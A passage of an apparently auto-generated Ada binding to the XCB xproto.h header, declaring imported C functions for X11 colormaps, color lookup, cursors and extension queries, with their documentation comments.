xcb_alloc_named_color_cookie_t -- /usr/include/xcb/xproto.h:10886 with Import => True, Convention => C, External_Name => "xcb_alloc_named_color_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_alloc_named_color_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_alloc_named_color_reply (c : access xcb.xcb_connection_t; cookie : xcb_alloc_named_color_cookie_t; e : System.Address) return access xcb_alloc_named_color_reply_t -- /usr/include/xcb/xproto.h:10906 with Import => True, Convention => C, External_Name => "xcb_alloc_named_color_reply"; --*< function xcb_alloc_color_cells_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:10911 with Import => True, Convention => C, External_Name => "xcb_alloc_color_cells_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_alloc_color_cells (c : access xcb.xcb_connection_t; contiguous : bits_stdint_uintn_h.uint8_t; cmap : xcb_colormap_t; colors : bits_stdint_uintn_h.uint16_t; planes : bits_stdint_uintn_h.uint16_t) return xcb_alloc_color_cells_cookie_t -- /usr/include/xcb/xproto.h:10922 with Import => True, Convention => C, External_Name => "xcb_alloc_color_cells"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_alloc_color_cells_unchecked (c : access xcb.xcb_connection_t; contiguous : bits_stdint_uintn_h.uint8_t; cmap : xcb_colormap_t; colors : bits_stdint_uintn_h.uint16_t; planes : bits_stdint_uintn_h.uint16_t) return xcb_alloc_color_cells_cookie_t -- /usr/include/xcb/xproto.h:10940 with Import => True, Convention => C, External_Name => "xcb_alloc_color_cells_unchecked"; function xcb_alloc_color_cells_pixels (R : access constant xcb_alloc_color_cells_reply_t) return access bits_stdint_uintn_h.uint32_t -- /usr/include/xcb/xproto.h:10947 with Import => True, Convention => C, External_Name => "xcb_alloc_color_cells_pixels"; function xcb_alloc_color_cells_pixels_length (R : access constant xcb_alloc_color_cells_reply_t) return int -- /usr/include/xcb/xproto.h:10950 with Import => True, Convention => C, External_Name => "xcb_alloc_color_cells_pixels_length"; function xcb_alloc_color_cells_pixels_end (R : access constant xcb_alloc_color_cells_reply_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:10953 with Import => True, Convention => C, External_Name => "xcb_alloc_color_cells_pixels_end"; function xcb_alloc_color_cells_masks (R : access constant xcb_alloc_color_cells_reply_t) return access bits_stdint_uintn_h.uint32_t -- /usr/include/xcb/xproto.h:10956 with Import => True, Convention => C, External_Name => "xcb_alloc_color_cells_masks"; function xcb_alloc_color_cells_masks_length (R : access constant xcb_alloc_color_cells_reply_t) return int -- /usr/include/xcb/xproto.h:10959 with Import => True, Convention => C, External_Name => "xcb_alloc_color_cells_masks_length"; function xcb_alloc_color_cells_masks_end (R : access constant xcb_alloc_color_cells_reply_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:10962 with Import => True, Convention => C, External_Name => "xcb_alloc_color_cells_masks_end"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_alloc_color_cells_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_alloc_color_cells_reply (c : access xcb.xcb_connection_t; cookie : xcb_alloc_color_cells_cookie_t; e : System.Address) return access xcb_alloc_color_cells_reply_t -- /usr/include/xcb/xproto.h:10979 with Import => True, Convention => C, External_Name => "xcb_alloc_color_cells_reply"; --*< function xcb_alloc_color_planes_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:10984 with Import => True, Convention => C, External_Name => "xcb_alloc_color_planes_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_alloc_color_planes (c : access xcb.xcb_connection_t; contiguous : bits_stdint_uintn_h.uint8_t; cmap : xcb_colormap_t; colors : bits_stdint_uintn_h.uint16_t; reds : bits_stdint_uintn_h.uint16_t; greens : bits_stdint_uintn_h.uint16_t; blues : bits_stdint_uintn_h.uint16_t) return xcb_alloc_color_planes_cookie_t -- /usr/include/xcb/xproto.h:10995 with Import => True, Convention => C, External_Name => "xcb_alloc_color_planes"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_alloc_color_planes_unchecked (c : access xcb.xcb_connection_t; contiguous : bits_stdint_uintn_h.uint8_t; cmap : xcb_colormap_t; colors : bits_stdint_uintn_h.uint16_t; reds : bits_stdint_uintn_h.uint16_t; greens : bits_stdint_uintn_h.uint16_t; blues : bits_stdint_uintn_h.uint16_t) return xcb_alloc_color_planes_cookie_t -- /usr/include/xcb/xproto.h:11015 with Import => True, Convention => C, External_Name => "xcb_alloc_color_planes_unchecked"; function xcb_alloc_color_planes_pixels (R : access constant xcb_alloc_color_planes_reply_t) return access bits_stdint_uintn_h.uint32_t -- /usr/include/xcb/xproto.h:11024 with Import => True, Convention => C, External_Name => "xcb_alloc_color_planes_pixels"; function xcb_alloc_color_planes_pixels_length (R : access constant xcb_alloc_color_planes_reply_t) return int -- /usr/include/xcb/xproto.h:11027 with Import => True, Convention => C, External_Name => "xcb_alloc_color_planes_pixels_length"; function xcb_alloc_color_planes_pixels_end (R : access constant xcb_alloc_color_planes_reply_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:11030 with Import => True, Convention => C, External_Name => "xcb_alloc_color_planes_pixels_end"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_alloc_color_planes_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_alloc_color_planes_reply (c : access xcb.xcb_connection_t; cookie : xcb_alloc_color_planes_cookie_t; e : System.Address) return access xcb_alloc_color_planes_reply_t -- /usr/include/xcb/xproto.h:11047 with Import => True, Convention => C, External_Name => "xcb_alloc_color_planes_reply"; --*< function xcb_free_colors_sizeof (u_buffer : System.Address; pixels_len : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:11052 with Import => True, Convention => C, External_Name => "xcb_free_colors_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_free_colors_checked (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t; plane_mask : bits_stdint_uintn_h.uint32_t; pixels_len : bits_stdint_uintn_h.uint32_t; pixels : access bits_stdint_uintn_h.uint32_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11067 with Import => True, Convention => C, External_Name => "xcb_free_colors_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_free_colors (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t; plane_mask : bits_stdint_uintn_h.uint32_t; pixels_len : bits_stdint_uintn_h.uint32_t; pixels : access bits_stdint_uintn_h.uint32_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11082 with Import => True, Convention => C, External_Name => "xcb_free_colors"; function xcb_free_colors_pixels (R : access constant xcb_free_colors_request_t) return access bits_stdint_uintn_h.uint32_t -- /usr/include/xcb/xproto.h:11089 with Import => True, Convention => C, External_Name => "xcb_free_colors_pixels"; function xcb_free_colors_pixels_length (R : access constant xcb_free_colors_request_t) return int -- /usr/include/xcb/xproto.h:11092 with Import => True, Convention => C, External_Name => "xcb_free_colors_pixels_length"; function xcb_free_colors_pixels_end (R : access constant xcb_free_colors_request_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:11095 with Import => True, Convention => C, External_Name => "xcb_free_colors_pixels_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_coloritem_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_coloritem_t) -- procedure xcb_coloritem_next (i : access xcb_coloritem_iterator_t) -- /usr/include/xcb/xproto.h:11106 with Import => True, Convention => C, External_Name => "xcb_coloritem_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_coloritem_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_coloritem_end (i : xcb_coloritem_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:11118 with Import => True, Convention => C, External_Name => "xcb_coloritem_end"; function xcb_store_colors_sizeof (u_buffer : System.Address; items_len : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:11121 with Import => True, Convention => C, External_Name => "xcb_store_colors_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_store_colors_checked (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t; items_len : bits_stdint_uintn_h.uint32_t; items : access constant xcb_coloritem_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11136 with Import => True, Convention => C, External_Name => "xcb_store_colors_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_store_colors (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t; items_len : bits_stdint_uintn_h.uint32_t; items : access constant xcb_coloritem_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11150 with Import => True, Convention => C, External_Name => "xcb_store_colors"; function xcb_store_colors_items (R : access constant xcb_store_colors_request_t) return access xcb_coloritem_t -- /usr/include/xcb/xproto.h:11156 with Import => True, Convention => C, External_Name => "xcb_store_colors_items"; function xcb_store_colors_items_length (R : access constant xcb_store_colors_request_t) return int -- /usr/include/xcb/xproto.h:11159 with Import => True, Convention => C, External_Name => "xcb_store_colors_items_length"; function xcb_store_colors_items_iterator (R : access constant xcb_store_colors_request_t) return xcb_coloritem_iterator_t -- /usr/include/xcb/xproto.h:11162 with Import => True, Convention => C, External_Name => "xcb_store_colors_items_iterator"; function xcb_store_named_color_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:11165 with Import => True, Convention => C, External_Name => "xcb_store_named_color_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_store_named_color_checked (c : access xcb.xcb_connection_t; flags : bits_stdint_uintn_h.uint8_t; cmap : xcb_colormap_t; pixel : bits_stdint_uintn_h.uint32_t; name_len : bits_stdint_uintn_h.uint16_t; name : Interfaces.C.Strings.chars_ptr) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11179 with Import => True, Convention => C, External_Name => "xcb_store_named_color_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_store_named_color (c : access xcb.xcb_connection_t; flags : bits_stdint_uintn_h.uint8_t; cmap : xcb_colormap_t; pixel : bits_stdint_uintn_h.uint32_t; name_len : bits_stdint_uintn_h.uint16_t; name : Interfaces.C.Strings.chars_ptr) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11195 with Import => True, Convention => C, External_Name => "xcb_store_named_color"; function xcb_store_named_color_name (R : access constant xcb_store_named_color_request_t) return Interfaces.C.Strings.chars_ptr -- /usr/include/xcb/xproto.h:11203 with Import => True, Convention => C, External_Name => "xcb_store_named_color_name"; function xcb_store_named_color_name_length (R : access constant xcb_store_named_color_request_t) return int -- /usr/include/xcb/xproto.h:11206 with Import => True, Convention => C, External_Name => "xcb_store_named_color_name_length"; function xcb_store_named_color_name_end (R : access constant xcb_store_named_color_request_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:11209 with Import => True, Convention => C, External_Name => "xcb_store_named_color_name_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_rgb_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_rgb_t) -- procedure xcb_rgb_next (i : access xcb_rgb_iterator_t) -- /usr/include/xcb/xproto.h:11220 with Import => True, Convention => C, External_Name => "xcb_rgb_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_rgb_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_rgb_end (i : xcb_rgb_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:11232 with Import => True, Convention => C, External_Name => "xcb_rgb_end"; function xcb_query_colors_sizeof (u_buffer : System.Address; pixels_len : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:11235 with Import => True, Convention => C, External_Name => "xcb_query_colors_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_query_colors (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t; pixels_len : bits_stdint_uintn_h.uint32_t; pixels : access bits_stdint_uintn_h.uint32_t) return xcb_query_colors_cookie_t -- /usr/include/xcb/xproto.h:11247 with Import => True, Convention => C, External_Name => "xcb_query_colors"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_query_colors_unchecked (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t; pixels_len : bits_stdint_uintn_h.uint32_t; pixels : access bits_stdint_uintn_h.uint32_t) return xcb_query_colors_cookie_t -- /usr/include/xcb/xproto.h:11264 with Import => True, Convention => C, External_Name => "xcb_query_colors_unchecked"; function xcb_query_colors_colors (R : access constant xcb_query_colors_reply_t) return access xcb_rgb_t -- /usr/include/xcb/xproto.h:11270 with Import => True, Convention => C, External_Name => "xcb_query_colors_colors"; function xcb_query_colors_colors_length (R : access constant xcb_query_colors_reply_t) return int -- /usr/include/xcb/xproto.h:11273 with Import => True, Convention => C, External_Name => "xcb_query_colors_colors_length"; function xcb_query_colors_colors_iterator (R : access constant xcb_query_colors_reply_t) return xcb_rgb_iterator_t -- /usr/include/xcb/xproto.h:11276 with Import => True, Convention => C, External_Name => "xcb_query_colors_colors_iterator"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_query_colors_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_query_colors_reply (c : access xcb.xcb_connection_t; cookie : xcb_query_colors_cookie_t; e : System.Address) return access xcb_query_colors_reply_t -- /usr/include/xcb/xproto.h:11293 with Import => True, Convention => C, External_Name => "xcb_query_colors_reply"; --*< function xcb_lookup_color_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:11298 with Import => True, Convention => C, External_Name => "xcb_lookup_color_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_lookup_color (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t; name_len : bits_stdint_uintn_h.uint16_t; name : Interfaces.C.Strings.chars_ptr) return xcb_lookup_color_cookie_t -- /usr/include/xcb/xproto.h:11309 with Import => True, Convention => C, External_Name => "xcb_lookup_color"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_lookup_color_unchecked (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t; name_len : bits_stdint_uintn_h.uint16_t; name : Interfaces.C.Strings.chars_ptr) return xcb_lookup_color_cookie_t -- /usr/include/xcb/xproto.h:11326 with Import => True, Convention => C, External_Name => "xcb_lookup_color_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_lookup_color_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_lookup_color_reply (c : access xcb.xcb_connection_t; cookie : xcb_lookup_color_cookie_t; e : System.Address) return access xcb_lookup_color_reply_t -- /usr/include/xcb/xproto.h:11346 with Import => True, Convention => C, External_Name => "xcb_lookup_color_reply"; --*< --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_create_cursor_checked (c : access xcb.xcb_connection_t; cid : xcb_cursor_t; source : xcb_pixmap_t; mask : xcb_pixmap_t; fore_red : bits_stdint_uintn_h.uint16_t; fore_green : bits_stdint_uintn_h.uint16_t; fore_blue : bits_stdint_uintn_h.uint16_t; back_red : bits_stdint_uintn_h.uint16_t; back_green : bits_stdint_uintn_h.uint16_t; back_blue : bits_stdint_uintn_h.uint16_t; x : bits_stdint_uintn_h.uint16_t; y : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11362 with Import => True, Convention => C, External_Name => "xcb_create_cursor_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_create_cursor (c : access xcb.xcb_connection_t; cid : xcb_cursor_t; source : xcb_pixmap_t; mask : xcb_pixmap_t; fore_red : bits_stdint_uintn_h.uint16_t; fore_green : bits_stdint_uintn_h.uint16_t; fore_blue : bits_stdint_uintn_h.uint16_t; back_red : bits_stdint_uintn_h.uint16_t; back_green : bits_stdint_uintn_h.uint16_t; back_blue : bits_stdint_uintn_h.uint16_t; x : bits_stdint_uintn_h.uint16_t; y : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11384 with Import => True, Convention => C, External_Name => "xcb_create_cursor"; --* -- * @brief create cursor -- * -- * @param c The connection -- * @param cid The ID with which you will refer to the cursor, created by `xcb_generate_id`. -- * @param source_font In which font to look for the cursor glyph. -- * @param mask_font In which font to look for the mask glyph. -- * @param source_char The glyph of \a source_font to use. -- * @param mask_char The glyph of \a mask_font to use as a mask: Pixels which are set to 1 define -- * which source pixels are displayed. All pixels which are set to 0 are not -- * displayed. -- * @param fore_red The red value of the foreground color. -- * @param fore_green The green value of the foreground color. -- * @param fore_blue The blue value of the foreground color. -- * @param back_red The red value of the background color. -- * @param back_green The green value of the background color. -- * @param back_blue The blue value of the background color. -- * @return A cookie -- * -- * Creates a cursor from a font glyph. X provides a set of standard cursor shapes -- * in a special font named cursor. Applications are encouraged to use this -- * interface for their cursors because the font can be customized for the -- * individual display type. -- * -- * All pixels which are set to 1 in the source will use the foreground color (as -- * specified by \a fore_red, \a fore_green and \a fore_blue). All pixels set to 0 -- * will use the background color (as specified by \a back_red, \a back_green and -- * \a back_blue). -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_create_glyph_cursor_checked (c : access xcb.xcb_connection_t; cid : xcb_cursor_t; source_font : xcb_font_t; mask_font : xcb_font_t; source_char : bits_stdint_uintn_h.uint16_t; mask_char : bits_stdint_uintn_h.uint16_t; fore_red : bits_stdint_uintn_h.uint16_t; fore_green : bits_stdint_uintn_h.uint16_t; fore_blue : bits_stdint_uintn_h.uint16_t; back_red : bits_stdint_uintn_h.uint16_t; back_green : bits_stdint_uintn_h.uint16_t; back_blue : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11431 with Import => True, Convention => C, External_Name => "xcb_create_glyph_cursor_checked"; --* -- * @brief create cursor -- * -- * @param c The connection -- * @param cid The ID with which you will refer to the cursor, created by `xcb_generate_id`. -- * @param source_font In which font to look for the cursor glyph. -- * @param mask_font In which font to look for the mask glyph. -- * @param source_char The glyph of \a source_font to use. -- * @param mask_char The glyph of \a mask_font to use as a mask: Pixels which are set to 1 define -- * which source pixels are displayed. All pixels which are set to 0 are not -- * displayed. -- * @param fore_red The red value of the foreground color. -- * @param fore_green The green value of the foreground color. -- * @param fore_blue The blue value of the foreground color. -- * @param back_red The red value of the background color. -- * @param back_green The green value of the background color. -- * @param back_blue The blue value of the background color. -- * @return A cookie -- * -- * Creates a cursor from a font glyph. X provides a set of standard cursor shapes -- * in a special font named cursor. Applications are encouraged to use this -- * interface for their cursors because the font can be customized for the -- * individual display type. -- * -- * All pixels which are set to 1 in the source will use the foreground color (as -- * specified by \a fore_red, \a fore_green and \a fore_blue). All pixels set to 0 -- * will use the background color (as specified by \a back_red, \a back_green and -- * \a back_blue). -- * -- function xcb_create_glyph_cursor (c : access xcb.xcb_connection_t; cid : xcb_cursor_t; source_font : xcb_font_t; mask_font : xcb_font_t; source_char : bits_stdint_uintn_h.uint16_t; mask_char : bits_stdint_uintn_h.uint16_t; fore_red : bits_stdint_uintn_h.uint16_t; fore_green : bits_stdint_uintn_h.uint16_t; fore_blue : bits_stdint_uintn_h.uint16_t; back_red : bits_stdint_uintn_h.uint16_t; back_green : bits_stdint_uintn_h.uint16_t; back_blue : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11475 with Import => True, Convention => C, External_Name => "xcb_create_glyph_cursor"; --* -- * @brief Deletes a cursor -- * -- * @param c The connection -- * @param cursor The cursor to destroy. -- * @return A cookie -- * -- * Deletes the association between the cursor resource ID and the specified -- * cursor. The cursor is freed when no other resource references it. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_free_cursor_checked (c : access xcb.xcb_connection_t; cursor : xcb_cursor_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11503 with Import => True, Convention => C, External_Name => "xcb_free_cursor_checked"; --* -- * @brief Deletes a cursor -- * -- * @param c The connection -- * @param cursor The cursor to destroy. -- * @return A cookie -- * -- * Deletes the association between the cursor resource ID and the specified -- * cursor. The cursor is freed when no other resource references it. -- * -- function xcb_free_cursor (c : access xcb.xcb_connection_t; cursor : xcb_cursor_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11518 with Import => True, Convention => C, External_Name => "xcb_free_cursor"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_recolor_cursor_checked (c : access xcb.xcb_connection_t; cursor : xcb_cursor_t; fore_red : bits_stdint_uintn_h.uint16_t; fore_green : bits_stdint_uintn_h.uint16_t; fore_blue : bits_stdint_uintn_h.uint16_t; back_red : bits_stdint_uintn_h.uint16_t; back_green : bits_stdint_uintn_h.uint16_t; back_blue : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11533 with Import => True, Convention => C, External_Name => "xcb_recolor_cursor_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_recolor_cursor (c : access xcb.xcb_connection_t; cursor : xcb_cursor_t; fore_red : bits_stdint_uintn_h.uint16_t; fore_green : bits_stdint_uintn_h.uint16_t; fore_blue : bits_stdint_uintn_h.uint16_t; back_red : bits_stdint_uintn_h.uint16_t; back_green : bits_stdint_uintn_h.uint16_t; back_blue : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:11551 with Import => True, Convention => C, External_Name => "xcb_recolor_cursor"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_query_best_size (c : access xcb.xcb_connection_t; u_class : bits_stdint_uintn_h.uint8_t; drawable : xcb_drawable_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t) return xcb_query_best_size_cookie_t -- /usr/include/xcb/xproto.h:11569 with Import => True, Convention => C, External_Name => "xcb_query_best_size"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_query_best_size_unchecked (c : access xcb.xcb_connection_t; u_class : bits_stdint_uintn_h.uint8_t; drawable : xcb_drawable_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t) return xcb_query_best_size_cookie_t -- /usr/include/xcb/xproto.h:11587 with Import => True, Convention => C, External_Name => "xcb_query_best_size_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_query_best_size_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_query_best_size_reply (c : access xcb.xcb_connection_t; cookie : xcb_query_best_size_cookie_t; e : System.Address) return access xcb_query_best_size_reply_t -- /usr/include/xcb/xproto.h:11608 with Import => True, Convention => C, External_Name => "xcb_query_best_size_reply"; --*< function xcb_query_extension_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:11613 with Import => True, Convention => C, External_Name => "xcb_query_extension_sizeof"; --* -- * @brief check if extension is present -- * -- * @param c The connection -- * @param name_len The length of \a name in bytes. -- * @param name The name of the extension to query, for example "RANDR". This is case -- * sensitive! -- * @return A cookie -- * -- * Determines if the specified extension is present on this X11 server. -- * -- * Every extension has a unique `major_opcode` to identify requests, the minor -- * opcodes and request formats are extension-specific. If the extension provides -- * events and errors, the `first_event` and `first_error` fields in the reply are -- * set accordingly. -- * -- * There should rarely be a need to use this request directly, XCB provides the -- * `xcb_get_extension_data` function instead. -- * -- function xcb_query_extension (c : access xcb.xcb_connection_t; name_len : bits_stdint_uintn_h.uint16_t; name : Interfaces.C.Strings.chars_ptr) return xcb_query_extension_cookie_t -- /usr/include/xcb/xproto.h:11636 with Import => True, Convention => C, External_Name => "xcb_query_extension"; --* -- * @brief check if extension is present -- * -- * @param c The connection -- * @param name_len The length of \a name in bytes. -- * @param name The name of the extension to query, for example "RANDR". This is case -- * sensitive! -- * @return A cookie -- * -- * Determines if the specified extension is present on this X11 server. -- * -- * Every extension has a unique `major_opcode` to identify requests, the minor -- * opcodes and request formats are extension-specific. If the extension provides -- * events and errors, the `first_event` and `first_error` fields in the reply are -- * set accordingly. -- * -- * There should rarely be a need to use this request directly, XCB provides the -- * `xcb_get_extension_data` function instead. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_query_extension_unchecked (c : access xcb.xcb_connection_t; name_len : bits_stdint_uintn_h.uint16_t; name : Interfaces.C.Strings.chars_ptr) return xcb_query_extension_cookie_t -- /usr/include/xcb/xproto.h:11664 with Import => True, Convention => C, External_Name => "xcb_query_extension_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_query_extension_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_query_extension_reply (c : access xcb.xcb_connection_t; cookie : xcb_query_extension_cookie_t; e : System.Address) return access xcb_query_extension_reply_t -- /usr/include/xcb/xproto.h:11683 with Import => True, Convention => C, External_Name => "xcb_query_extension_reply"; --*< function xcb_list_extensions_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:11688 with Import => True, Convention => C, External_Name => "xcb_list_extensions_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_list_extensions (c : access xcb.xcb_connection_t) return xcb_list_extensions_cookie_t -- /usr/include/xcb/xproto.h:11699 with Import => True, Convention => C, External_Name => "xcb_list_extensions"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_list_extensions_unchecked (c : access xcb.xcb_connection_t) return xcb_list_extensions_cookie_t -- /usr/include/xcb/xproto.h:11713 with Import => True, Convention => C, External_Name => "xcb_list_extensions_unchecked"; function xcb_list_extensions_names_length (R : access constant xcb_list_extensions_reply_t) return int -- /usr/include/xcb/xproto.h:11716 with Import => True, Convention => C, External_Name => "xcb_list_extensions_names_length"; function xcb_list_extensions_names_iterator (R : access constant xcb_list_extensions_reply_t) return xcb_str_iterator_t -- /usr/include/xcb/xproto.h:11719 with Import => True, Convention => C, External_Name => "xcb_list_extensions_names_iterator"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_list_extensions_unchecked(). 